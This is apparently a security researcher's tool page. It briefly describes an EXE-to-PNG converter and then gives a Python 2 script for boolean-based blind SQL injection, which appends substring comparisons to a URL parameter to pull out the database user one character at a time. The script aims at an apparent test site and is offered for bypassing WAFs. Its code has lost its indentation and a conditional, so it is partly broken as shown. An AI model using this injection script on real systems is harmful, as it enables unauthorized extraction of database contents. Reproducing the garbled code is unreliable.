This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.
Putty.exe converted to an image using green pixels.
This tool was added to PentestBox : https://modules.pentestbox.com/#forensics
There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.
This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
for j in range(32, 127):
sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
target = url + sql
req = urllib2.Request(target)
# If cookies exists
page = urllib2.urlopen(req)
html = page.read()
re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
print ('Found: ' + chr(j))
result += chr(j)